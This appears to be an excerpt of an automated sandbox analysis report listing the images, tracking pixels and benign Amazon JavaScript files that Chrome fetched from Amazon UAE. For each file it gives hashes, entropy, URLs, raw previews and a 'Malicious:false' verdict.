                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistNavFrontEndCards__p13n-zg-nav-tree-all:p13n-zg-nav-tree-all__0VRY2YcE",["exports","tslib"],function(a,b){a._operationNames=[];a.card=function(){return b.__awaiter(void 0,void 0,void 0,function(){return b.__generator(this,function(c){return[2]})})}});.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2939
                                                                                                                                                                                                                                                                Entropy (8bit):7.854205744631827
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6iGRXUU2QvrcpMbhjcyMU7B5i99JpnVFL5zdPB1Qnu9oGaWLTD6Ms+ZI:TqOEKjcCNcXO509J5d1Mw6P
                                                                                                                                                                                                                                                                MD5:4C56397C1B8592F275D65A88A46FD2DE
                                                                                                                                                                                                                                                                SHA1:F85F68FF270455D4234E7465DC8175D04CCE1DFF
                                                                                                                                                                                                                                                                SHA-256:6B09C0115CD20D332D985AF2F72A6D29E0EA95C5D3E5BF2AC033CEB3D0C8A768
                                                                                                                                                                                                                                                                SHA-512:5A826D801ACCF134633F1BC04FF7FB62E4AD4A26B08BC8F3EF95560E18F0356922764216D9E7BB52EF82A8D768584D66EAE5EB8212B7CD09BDDCBA6709B14D45
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1.."....#2AQRt......$35BESqr.....DTUa..%CF..cd...............................................!Qa...12"Rb.............?..h....................a.AA.~+/..b.Z_.....U......qi|..PPEf..+*x.."..=.e`.h.;.|&.lW.....................+S.$.i...AT...h..}.U.N-....u?.G....^.j..5RAS.VT|;5..+.].,....!..2}+....;.$..F..o|.ncsy...w..:Lj.[U.c.....1[...o$N..x..y..)..)..kjL.n{^...v..EL.;.]...]..\.. .o. ...........y...X..<O`$.x.+......Tb.=;"dY.R...,.&.T.+.0..........q.FJ..@.6..t...........6..gt...-.Y3...........7.Q...t....9.Om.b$..{H5P..xh.Dm..KUZk.s........nu.{....Nq'`#I....0..|.t.gW.)Fl....i.....D..pzL}%....9.3_.^.Y.^Y.42n.g....u....1...Y.._...jN..>.._j..O.slWke...)..DO,."...d.........*...........Nd.....m....1.V.)m..i.tyJ...v..{.<.{..2.o.3Y..g....:z...t...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 204 x 201, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13009
                                                                                                                                                                                                                                                                Entropy (8bit):7.966097615657002
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:zLyH9t/CoXuz+4aIg1BSDUuk3ArwkPi6IR9eH2U50Zw3yB2aWFO+6+CDE1DYFy:XyH9Sg1BAUrwrwklIR4Wb4haBQKU
                                                                                                                                                                                                                                                                MD5:C9F8088EA9142D2191E3EC95D0BD5D52
                                                                                                                                                                                                                                                                SHA1:EB5B16871B058CE5F1B4EF2446410DA81DFB311A
                                                                                                                                                                                                                                                                SHA-256:A18087E0B73C5713577320D4E76A1EA9563F2A880AA4760D7B55891F8785B677
                                                                                                                                                                                                                                                                SHA-512:24354A98B1555BD7141403BA0D0706F0A2154B03BFB22DAE5450ED4C763F5AE182BC576ED9C21B1306FF29FF2390F6F0E824F504F5B3F3C23CD7485E3FEA77CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/3177pZFH0eL._SY201_FMpng_.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............o..A.. .IDATx^.y|.U.........@....mR..(...n..M!.D.QH...B/;..K..../T6.*....P...M6Y.7.L.9..7...YZ...y.u_Mf..{3.9.y..<......p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8....=........M.&..Rj.6..O>.+.........-......mmwT..+.>....k.pl)..`<.o.........5.W...Y5W>v._.....MzS.QEEe3.U@......^s.e...._{.cs2..3f....)..."...8...._{..<{...1P...Y..1..4.{..r3..Q...dM4'.."..k.X..G|........^k.;Wod.=7...d..~~.fL.au.m.......`..{.Z.,.Z."`E...2).....\...t.....S.R.2+r...k/l\...8...Y...`..."....y...v.\..z...~..e..h.<.M....l.y_.[?6..k7|z......'.E0g...0.'Y+.D#y.H".|.32....^..K.<k...Y`.....m..*....Ll1.....~.#?.n...;.}.Y...=.........B.......p...\y...w.n.....o...v.c!.-...c.Th........+.;7...z...`..Y.G..0....kDHY+.].......hvz_j,p.X..-...X.b.X...s_...M..9....8.&(.Y"x...I.[....t7.R6.cW.\u.........@)..cK.[bk.c..Bd.u....W{../.U0W.;/.....kew+IOb;..].."..+..:$.}n
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12466
                                                                                                                                                                                                                                                                Entropy (8bit):7.96556453508031
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:dqMHJl8CO/mtpyOHmNTGLdgk/JWcfHXFpOts0N:4MHXO/mtpVHAae0JWcf3KKm
                                                                                                                                                                                                                                                                MD5:854452981CCB494EA069BC36D64E1C34
                                                                                                                                                                                                                                                                SHA1:C72DC9EAEDEC75A4FBA8155CBD4D42918D1EE147
                                                                                                                                                                                                                                                                SHA-256:E207041BF4F9805EBBA71B953A92A857C4ABD0E22CF52A99229BCE75B20C6944
                                                                                                                                                                                                                                                                SHA-512:E27410B23B293DA18F48A9B9753CCC8E6449124144932BDB4AF7526A99F8C40C34A953E0584F91680A632CF7D94F196AF5654946EF8B381D44DA36E14B4CCA22
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81eOmCjD4oL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1..ABQaq.#2....RV...$3CSr.....46...5FT..................................................!.1..AQRSa."2....q.Bb.#3D...............?..D.}F7q.y^...#.....9...'..I.yM4.U[....H.......P....j..L....J.ixc(.z9Q&....]....yU=....\.'.+..k..y.W.j.!.+...9.....h..j..e.$..=/.U.K.X..".._*.....Q..2......|.....U..U...X7B....a3j.$..(.\...j..yR.B. 39..J.......0!(.2.O.>.q.r7..o..Qle...c.8..!{.l>k.c.v.....M.;$.....7..$..UVR...vg..$QF..s...zUR....#..`T....P......nn.-...u$O"....Ea..1..C....b.C9Z}.c|..U.....Q.T..#..$....|.l7..iG|...i..3...KC.K........r*..~....I(.i_Iu.i..1,..C....{'.M.6.VJI*..Dh...GXg.Bz......F\H..WU.$.0.f4......RZ.P3...h....>..M..G*....q4.V....ji...k.T....>$... ..\....d.9.[[..5...|Tp... DyZR.^A..eBn..\....PM......Q...*.fT...Fo"..u.b.@M
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):7.892696802540585
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:10V5IGb9nDWiP9X0RNI0vFFn52xXK2WogVOsE80Ylwp9IrturFRC6Vlz:10VyGbl7P9Iy0/n52s2W7VvqY6nWtujp
                                                                                                                                                                                                                                                                MD5:B49E93036E50C1F5B6A7275AEE673DAC
                                                                                                                                                                                                                                                                SHA1:085408361B8FA626C071E393992A287F7BA2006B
                                                                                                                                                                                                                                                                SHA-256:C61716C1DD1ED5AC06F44B1CDD796CBACF0DBCCE4090E4BC4FC4029AD4F1C2C7
                                                                                                                                                                                                                                                                SHA-512:8A03265EF345620DCAE9F4FD2CBE020136F96671E2BFD78E7E1F407B87C0AA73EDA57EB573F591A2B1EC195DDBB8E6B5639548FE4C9A7F340E14F7539D1FFC3E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,....".......................................................................................<.R........>d...8$...........s..r..J..*.:. .......c.....U.u\@.5..)<.. .+.8.@...k..Rx..Lq....5pu]@.5..)<.. .+.8.@..k..Z....Y.Fx.U.t..5..)>.. ..>.....................@.....0........>6........U...B.V....U...] A.dc.z..[|..]..of.4..`+....U...] T.T..j....dm..&...C..:......6:. .....Y...Fc....p..s...u\@.5..v..9....f...5:.........@.JYs.*<2v...XZ...".\.z..U...] .*g?W..W....G.....Y.&.....@.x.....w....{5..F.....t....8.:.A..5<o...] ....,...o..c.....@.....W.....fZ|.4R.....%`......`.i........~.~..0rs.....C.|..c..................#.....|4.H...<.|".@....L.m......(....[..........\..)^.......>~q....]y.y./M......k.,L.7J...............................................................z..;.s.jg..L.......6....0.0f..<c&....G
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2554%26pc%3D16655%26at%3D16655%26t%3D1723469060977%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16655
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 72x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3128
                                                                                                                                                                                                                                                                Entropy (8bit):7.836870324412846
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:To3YOg1uX8tcGiXBsGWsV7MKHVJsxAKR0H:sYDO8twBDpJJsxAKR0H
                                                                                                                                                                                                                                                                MD5:3088799ECAF631D8A8184A427C27E202
                                                                                                                                                                                                                                                                SHA1:3C7E5272FF9538FEE7C3D001460994232C4DCE49
                                                                                                                                                                                                                                                                SHA-256:EECC2ABD902107143E68ED5E538B515ADC88030EE09B1534B8AC0E5396E55462
                                                                                                                                                                                                                                                                SHA-512:BE2C3434F548D75E936EEE05A987990D4908A3F8EE09D182910B52AC6CBE5A7CBA46EFD8D257C8599DF30F3E34EAD95C77B288F3735A855776222CCDD6602101
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61lg6N3qjvL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........H.."..........u..................................................!."1A..2#q..QRa3Bb..............................................!............?....c...V}g..V...$!.q4..Wg.Z..?.o*...G.^..p......Q,cx..aX.?-....qO....H..*..2..?..I`..-^......">$.:.'.$.X.N......G....-.x.D.M...F.F].fI..4O.b..R.....R.V.Q...~L.$.......P..5.......o.1..1.`1.`1.`r7......x...yw........iLU.."@..../.........C..........NS...t......-.>64....Yg.z....@.1..1..1.^...?;..[............O}......g.5D.5.Q#.....E.jd.YZ..S....c..c..c..c...$.X.\**..........'...VM.Y..'.w.@..#z.RI......_....1..1..1..1..?9..:+..?..]oBE2h}....*.2s#<...8+.6...K../.......rO..c..c..c..c.7../......~.j.u.e._.@>..Ies......#m.(j..2.~AB.;..].j..1..1..1..9.............I..._..f4..i...R.......r....<.)....Y#d0.>.t...u.Ta..s.%$.t.HkFy......P?.GY:.S..y.....9J..U.b$+...k.1.G...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9464
                                                                                                                                                                                                                                                                Entropy (8bit):7.8614454368406514
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:PUfZRotOV4f+4cbawN9drNNUjyp49CnydVpc8Hf+Gne:PUfEm4f9cb7N/PKy49Cnyjpc8WGe
                                                                                                                                                                                                                                                                MD5:25BACBBBFB1E0FA84DAD156372F72881
                                                                                                                                                                                                                                                                SHA1:D8E85B0813FB5D2903310E039D3F4C6094005CB3
                                                                                                                                                                                                                                                                SHA-256:50875803E66EBDAAD65BD4CF01D044A468154895536B74AD7AA5AB5404B30BF5
                                                                                                                                                                                                                                                                SHA-512:D27DFBCEE36454610DA85DF560BBC6F4D165EF998B6D7EDEBDD32B8958905BC13706F10F2E2E97FA6A6AAD45BE7BB8B3B2F904EC2D7CEDF077C38E0DA0AEBE7F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3...............................................................................5.....................kl.........#.t.......................0|."`l.F...:8..................+4.453k....%1$..<....Z!>.^.3.>VzJ.n..@...............l.6......|..qLb..n}..x.k...&.s..L..v.%}C...4.................l.co.^>..KcF-.d......&...>............B.........GAI..4............=.)8epf........4...J.d..9............t...y.;?<...\Uo.S...7...........hU.......39`b.+...f6~.7Z..x...h..v.T..c.......l......AnJ[....<.!2..u.............r&c...$q..s.gi.)6z..=".1.b...X...h.Z2...%..1j.e...=..FC..^.v?9.f..6.............I...6...M..Xs.gJ.Y...Fr.d..k[....^...+N.`......n'>...BW...~}.{}K...5n...Cz.........(..V.-Z.R|....a....g"....6.~...e..:.....I.n..Z...*.;...".}...v...>|{..}...X..t.z.^.C.............2...%._CF..j..L...L..o
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2199
                                                                                                                                                                                                                                                                Entropy (8bit):7.786219739996043
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rSJph5RYWDAWOHi8Rco30cNrr/YQ+FXl1Ldwt/em52:TLphjY8YCu1r/YQ+F7LutN52
                                                                                                                                                                                                                                                                MD5:FD534D034E20D4933AA81E4C179E18D3
                                                                                                                                                                                                                                                                SHA1:9564481FEEE8A5D3F6A8630E4E7BBB52623BA746
                                                                                                                                                                                                                                                                SHA-256:F32675B2171D7123B19FE1FF23CFB7692DC435D4597BE7752F95DCDCFBFE10E8
                                                                                                                                                                                                                                                                SHA-512:4781C73D3E37EB3DA5D278E096E1337BC7933E2F6EE8B1DF6CBB22AA41D5631343BC909089D4EC90117A27B9C831F944E41F9328004A55B65E4338C345731713
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Under199_1x._SY116_CB659039825_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................1..!Qa."A.#2qr......CRs..Sb...............................................1..!A.."Q.............?.............._V.m.Gb.y.......U.DIoF.x.....v..k..i.."(.A..*.......oK?.<.mD.._..S..\.)..g...I".;N.............H..v..z...9}.k.,.V.~V(.6,.0.^`6$l`W..;a.6.p4...e$=..,.....G.b[.}D.b..t.5.c`._.t...`.f...6....z._*......Mq....^=..v...%(<X...a..S......*......z..E..kXUZ...-.(..Q.R.z.C.Z..C.>M...:./......ed..zh...m[.)b.AV.........%.3...iI.~G..>.p..t....j.........d$E.e5Ilt.&'B.).q*.].....]v......jDD.D@DD.D@Me.Fg...}.m.@_.6l...jZeV?*w's.P.(c..f.Vb...e.S~..=..QW...RY....%F..f..M.3.%.o.B.v.<.....C...)+.U..EZ..<..(R.sr....v.. ....~l8..7!...j...e\z...c...s...h.d.I...-.......n..d..qw.....S....-e.FSq@_f=..>.,.E.?......um......F.-..OFZ_'zP.f.u.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (310)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):311
                                                                                                                                                                                                                                                                Entropy (8bit):5.073537568777139
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Qs73kyM+BMLST+ELSWs6J9YM5UNb5IpDyXF0H1U:Z73keb6eaIpUUU
                                                                                                                                                                                                                                                                MD5:8FBCD7397015612749F5AEF3555E2DB0
                                                                                                                                                                                                                                                                SHA1:E35BEC608D098373D653726A48EA78172851FE89
                                                                                                                                                                                                                                                                SHA-256:F2F9E79D205218AE4E92C5D8BA5B6AA9564F2245BBA5630F45F79A2763EEB331
                                                                                                                                                                                                                                                                SHA-512:D051BA12F62C1BADFB8C746AD821DBEF06079D89B84667FC86A923055548D46243BD0C70454F3A27C4F104C439372BB569D4FEA5B772223172129A5EDDE413B1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistStaticFrontEndCards__p13n-zg-banner-landing-page-header:p13n-zg-banner-landing-page-header__bp9s6Sel",["exports","tslib"],function(a,b){a._operationNames=[];a.card=function(){return b.__awaiter(void 0,void 0,void 0,function(){return b.__generator(this,function(c){return[2]})})}});.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (64565)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):331197
                                                                                                                                                                                                                                                                Entropy (8bit):5.457377606315039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:5w70TUq0mTaL+gsW5MmGaW5gERNmJAK/OaZ05Z:5MRSW5aaW5grJAKrZ05Z
                                                                                                                                                                                                                                                                MD5:8D11E1344E8D218C563D06A64C47EE02
                                                                                                                                                                                                                                                                SHA1:FC949176844C9C12D7AE368311EF1B832DEDDA2E
                                                                                                                                                                                                                                                                SHA-256:FF7231C17F8AC6BB63F69FEEE9F023841DF9D2F8534E0ECCA62E5C8FE376E1BA
                                                                                                                                                                                                                                                                SHA-512:522D4DF630C41CFADBDD966A87419BCC57D5F3FAC2B1C1026C3C11312442144B7A69721FA25914E8F287C93F42C89662571891FA0C2F71B2C9447A934D594F7C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/8150jbgvn9L.js?AUIClients/SiegeClientSideEncryptionAUI
                                                                                                                                                                                                                                                                Preview:;(function(f) {. if (typeof window !== 'undefined') {. . return P.execute('siege-cse', function() {. try {. f();. P.declare('siege-cse', window.SiegeCrypto);. } catch (e) {. try {. . if (window.callPhantom && (!Function.prototype.bind || Function.prototype.bind.toString().replace(/bind/g, 'Error') != Error.toString())) {. console.log('siege-cse does not support PhantomJS 1.x, skipping error reporting');. return;. }. } catch (e) {}.. P.logError(e, 'siege-cse init error: ', 'WARN', 'siege-cse');. return;. }. });. } else if (typeof importScripts !== 'undefined') {. . return f();. } else {. throw new Error('Cannot initialize SiegeCrypto outside window or worker');. }.})(function() {. /////////////////////////.// BEGIN FILE SiegeCrypto.js./////////////////////////./*...Full source (including license, if applicable) included below..*/.!function(e,t){"object"==typeo
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):768
                                                                                                                                                                                                                                                                Entropy (8bit):5.18006490302809
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:2kjZ/xqKnc5OLxypEKBAoIjGw+iKS0JBJxBfeNfiR3:2WZ/x3nijTBAozw7KhJneNfiR
                                                                                                                                                                                                                                                                MD5:A31DABB0EF509DB9ACA5DA627458A90F
                                                                                                                                                                                                                                                                SHA1:1CE1E27C2484DBB446D234162E700DC24D476DDF
                                                                                                                                                                                                                                                                SHA-256:4C6029DEAEFEC0EC6726442FA6BF84EF5D28C40ABCA62DBEFE8E61FEFB09BEA8
                                                                                                                                                                                                                                                                SHA-512:A83523A9963581977A9CEE6F75D3FF46014CB60CDADE77BD98271662F73A726EB5D96D9EA5EEB4C9C42BBD29F2DAAF1816A5EB3CCB5801F59E2575593F824238
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01saU+uyHrL.js?AUIClients/SmxCartAssets
                                                                                                                                                                                                                                                                Preview:(function(b){var d=window.AmazonUIPageJS||window.P,c=d._namespace||d.attributeErrors,a=c?c("SmxCartAssets",""):d;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,d,c){b.when("A","a-secondary-view","Cart","ready").execute(function(a,b,d){a.declarative("smx-secondary-view","click",function(a){var e=a&&a.data||{},c=b.get("item-max-savings-ajax");c||(c=b.create(a.$target,{name:"item-max-savings-ajax",synchronous:!1,url:e.ajaxUrl+"?asin\x3d"+e.asin+"\x26isLightningDeal\x3d"+.e.isLightningDeal+"\x26merchantId\x3d"+e.merchantId}));c.show();d.logUECounter("item-max-savings-primary-ingress-click")});a.on("a:popover:afterHide:item-max-savings-ajax",function(){b.get("item-max-savings-ajax")&&b.remove("item-max-savings-ajax")})})});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5646
                                                                                                                                                                                                                                                                Entropy (8bit):7.821788006816416
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TuuRJNoC1UYW4P6VUH0spJWdS/AahuTw/GlZOu1G8li8Brr9Y8oU6av8j:ioNTK49HPTIQuEulYu1GcBlHv0j
                                                                                                                                                                                                                                                                MD5:CF7A4095B9C49F009805281D5823A45B
                                                                                                                                                                                                                                                                SHA1:588C7E2316A22343D1BF3ED0F0AF5FD93E4ED634
                                                                                                                                                                                                                                                                SHA-256:B47C2A9577099B53C86998483FD37BEE6D98FCE9B4DF96943CE6AE9FB1A0B3EF
                                                                                                                                                                                                                                                                SHA-512:CD3E835C07C683CD11DADD942705DE9BD96EB3BFA3359A6C7FE9708019B8E08FDF83E1AB06885276825DFCBDA4883641EA715BBD816334261B5C160902E0F10C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/412CLCbp2pL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6.................................................................................y.:t..m.y@.z...O.~..:..l....N.q..&'pW.;n4..$....O,D...D....<t..|s.a..5.o.....\N........x......p....<..o.t........Tv....{..W3.o..v.{...}...b...~....a....7.Ag.....?0B|v.<~..Y..zz*oi;.A....N......}.+mqT....f.+....O~..-........(....U.%....!f:.!.:.x?a...$.k.....:.g.....;.4.D....?.O.......o.k...r..S.H.u;I.!.F..n....y.).......%x..,.....=....3.C}@....0..u}..V]..9+.r.z.r..T.Vue...kC.}..$s.c[m&j.......lw..x.,...).G...n..n..p..sY.G~....w1...,........x...=.7kLQ.,.^,.].0..Mf.....,.....0y...#.N?..e.jrv..u..U....c......".o.Q|..{_....B..x.........0.z.SX....j....i..N.wuo.._..............................0.............................!013 "#2C@A`4BPQR.............F..0.`.Gz~....NrI.)..LtJc.S....t.t*C.R.....Ltja.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6396
                                                                                                                                                                                                                                                                Entropy (8bit):7.844219377650766
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ypgtuk7HLQYvQq+zU9IUlQPLtPF895UfSId1a:yGUk7HZVi8GLf+5UHdg
                                                                                                                                                                                                                                                                MD5:A66436B98276AFA89C76AB1D3F90AADA
                                                                                                                                                                                                                                                                SHA1:3F56C5E6D360B84790211EC754BEFFCBA1BEEC9F
                                                                                                                                                                                                                                                                SHA-256:6A6425B47CD7E2C4D57A169CE758D186D432DAA67E293C516FCFDA21A7DD5D7A
                                                                                                                                                                                                                                                                SHA-512:0C96691F2A62C629582FBB039CEDAE8F200F10511EFA1242359D28F60E7987FE4D6A25D67B55036A9A36E0E6832838BBC6A916DB07B381044C4C40B2F94BD376
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41E6wo15qgL._SR240,220_.jpg"
